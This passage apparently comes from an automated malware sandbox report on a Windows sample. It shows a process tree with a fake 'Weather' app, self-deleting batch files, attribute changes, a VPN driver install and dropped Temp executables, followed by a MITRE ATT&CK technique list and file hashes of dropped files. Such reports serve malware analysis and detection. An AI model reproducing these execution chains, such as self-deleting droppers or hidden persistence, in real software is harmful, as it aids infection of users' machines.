                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1e0,0x1e4,0x1e8,0x1bc,0x1ec,0x7fff82f29ec0,0x7fff82f29ed0,0x7fff82f29ee0
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:5456
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff7bfb54e60,0x7ff7bfb54e70,0x7ff7bfb54e80
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:6964
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1728,5560130550171338334,14939285053785815784,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5408_1768704079" --mojo-platform-channel-handle=1852 /prefetch:8
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:6604
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1728,5560130550171338334,14939285053785815784,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5408_1768704079" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1788 /prefetch:2
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:7016
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1728,5560130550171338334,14939285053785815784,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5408_1768704079" --mojo-platform-channel-handle=2144 /prefetch:8
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:7284
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1728,5560130550171338334,14939285053785815784,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5408_1768704079" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2228 /prefetch:1
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:4432
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,5560130550171338334,14939285053785815784,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5408_1768704079" --mojo-platform-channel-handle=3008 /prefetch:8
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:2284
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1728,5560130550171338334,14939285053785815784,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5408_1768704079" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3124 /prefetch:2
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:6936
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,5560130550171338334,14939285053785815784,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5408_1768704079" --mojo-platform-channel-handle=3312 /prefetch:8
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:6164
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,5560130550171338334,14939285053785815784,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5408_1768704079" --mojo-platform-channel-handle=3324 /prefetch:8
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                PID:5352
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,5560130550171338334,14939285053785815784,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5408_1768704079" --mojo-platform-channel-handle=440 /prefetch:8
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                  PID:5676
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,5560130550171338334,14939285053785815784,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5408_1768704079" --mojo-platform-channel-handle=824 /prefetch:8
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:5416
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE23A2.bat" "
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:5416
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                    C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                    PID:6072
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                    C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                    PID:7048
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                    C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE23A2.bat"
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                    PID:7884
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE23A2.bat" "
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:5504
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" cls"
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:6164
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE2401.bat" "
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:5568
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                          C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                          PID:4220
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                          C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                          PID:5748
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                          C:\Windows\System32\timeout.exe 5
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                          PID:7728
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                          C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE2401.bat"
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                          PID:716
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" cls"
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:4444
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE2401.bat" "
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:688
                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:6980
                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                          PID:6432
                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:5524
                                                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:6092
                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:5340
                                                                                                                                                                                                                                • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{1767eea0-3fd6-4645-95a1-b06c94a77d64}\oemvista.inf" "9" "4d14a44ff" "0000000000000164" "WinSta0\Default" "0000000000000174" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:4256
                                                                                                                                                                                                                                  • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                    DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000164"
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:4124
                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                    PID:4040
                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:6944
                                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:5268
                                                                                                                                                                                                                                      • C:\Windows\system32\werfault.exe
                                                                                                                                                                                                                                        werfault.exe /h /shared Global\643e4bb11b5e48fc8fdcadca707e3656 /t 5876 /p 6432
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:5624
                                                                                                                                                                                                                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:5880
                                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                              MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:5504
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4786.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\4786.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:8144
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\4BEC.exe
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\4BEC.exe
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:5420
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\51E8.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\51E8.exe
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:5600
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\51E8.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\51E8.exe"
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:5352
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\6031.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\6031.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:4420
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\6031.exe
                                                                                                                                                                                                                                                          "{path}"
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:4404
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\6031.exe
                                                                                                                                                                                                                                                            "{path}"
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:5308
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\669B.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\669B.exe
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:6372
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\6EAA.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\6EAA.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:4508
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\736E.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\736E.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:1280
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\79F7.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\79F7.exe
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:7236
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\79F7.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\79F7.exe
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:6016
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:6108
                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:7492
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:6992
                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:1944
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:5876
                                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:6548
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:7608
                                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:3804
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:4352
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\C871.exe
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\C871.exe
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:6224
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\DBBC.exe
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\DBBC.exe
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:688
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\E34E.exe
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\E34E.exe
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:5820
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\F88D.exe
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\F88D.exe
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:3564

                                                                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                              Persistence

                                                                                                                                                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                              T1060

                                                                                                                                                                                                                                                                                              Hidden Files and Directories

                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                              T1158

                                                                                                                                                                                                                                                                                              Defense Evasion

                                                                                                                                                                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                              T1497

                                                                                                                                                                                                                                                                                              Modify Registry

                                                                                                                                                                                                                                                                                              4
                                                                                                                                                                                                                                                                                              T1112

                                                                                                                                                                                                                                                                                              Install Root Certificate

                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                              T1130

                                                                                                                                                                                                                                                                                              Hidden Files and Directories

                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                              T1158

                                                                                                                                                                                                                                                                                              Credential Access

                                                                                                                                                                                                                                                                                              Credentials in Files

                                                                                                                                                                                                                                                                                              4
                                                                                                                                                                                                                                                                                              T1081

                                                                                                                                                                                                                                                                                              Discovery

                                                                                                                                                                                                                                                                                              Software Discovery

                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                              T1518

                                                                                                                                                                                                                                                                                              Query Registry

                                                                                                                                                                                                                                                                                              9
                                                                                                                                                                                                                                                                                              T1012

                                                                                                                                                                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                              T1497

                                                                                                                                                                                                                                                                                              System Information Discovery

                                                                                                                                                                                                                                                                                              9
                                                                                                                                                                                                                                                                                              T1082

                                                                                                                                                                                                                                                                                              Security Software Discovery

                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                              T1063

                                                                                                                                                                                                                                                                                              Peripheral Device Discovery

                                                                                                                                                                                                                                                                                              3
                                                                                                                                                                                                                                                                                              T1120

                                                                                                                                                                                                                                                                                              Remote System Discovery

                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                              T1018

                                                                                                                                                                                                                                                                                              Collection

                                                                                                                                                                                                                                                                                              Data from Local System

                                                                                                                                                                                                                                                                                              4
                                                                                                                                                                                                                                                                                              T1005

                                                                                                                                                                                                                                                                                              Command and Control

                                                                                                                                                                                                                                                                                              Web Service

                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                              T1102

                                                                                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                                                                                              • C:\Program Files\unins0000.dat
                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                b1fea024dd26bb61f24d14f74e21574c

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                750ecb662506d66fc5a8477ad9f92685f8c9e7ee

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                2038c6a04451ac48ad3cf25d95bb1bfded2d7b6d0b7c012dad70a71205ea71c9

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                78633190ac428fc5b8686ef14a36214d305e57dec6281bf70a1f02d918a3db1e54b30a3941312958b4db861c2ba37c61cc8880382dab3959f728b377ca9f1a86

                                                                                                                                                                                                                                                                                              • C:\Program Files\unins0000.dll
                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                466f323c95e55fe27ab923372dffff50

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                b2dc4328c22fd348223f22db5eca386177408214

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                6bfb49245a5a92113a71f731fc22fbb8397f836a123b3267196a2a4f8dd70c5c

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                60e242f873d76f77ec7486460d1181468ed060113f6331ab0a4bb540531e0526177819b1413edb316e1d133bd467cfcaacbbe6eb6f63f5b9a9777f50de39cbb6

                                                                                                                                                                                                                                                                                              • C:\Program Files\unins0000.vbs
                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                6074e379e89c51463ee3a32ff955686a

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                0c2772c9333bb1fe35b7e30584cefabdf29f71d1

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                3d4716dfe7a52575a064590797413b4d00f2366a77af43cf83b131ab43df145e

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                0522292e85b179727b62271763eecb23a2042f46023336034ae8f477cd25a65e12519582d08999116d193e6e105753685356b0244c451139a21d4174fb4f6933

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                3fbd82cddfe91a43d84f4c2cf6dc8ab3

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                dcce22f93b8370880247be827b5e2029e0fd2ce3

                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                fbbf42220c7ca232e2c259ba4a249bc88dfde1e6676baf422ba05be816a319e4

                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                03a07d49ab971eb81a196242680ec2797d83fff8885d8461553c8b5a1c946f26cc27ac6da517690570255cb99d17e86959880586a625ada79da9ef689710589f

                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\59D1C89B35882FB67B19C498B4BDBDE0
                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                d5e6bd2ce4e51c51a2ef5ebc90d39f6b

                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                70881530e4cfdbc9752a17780262e2490a918cf5

                                                                                                                                                                                                                                                                                                SHA256

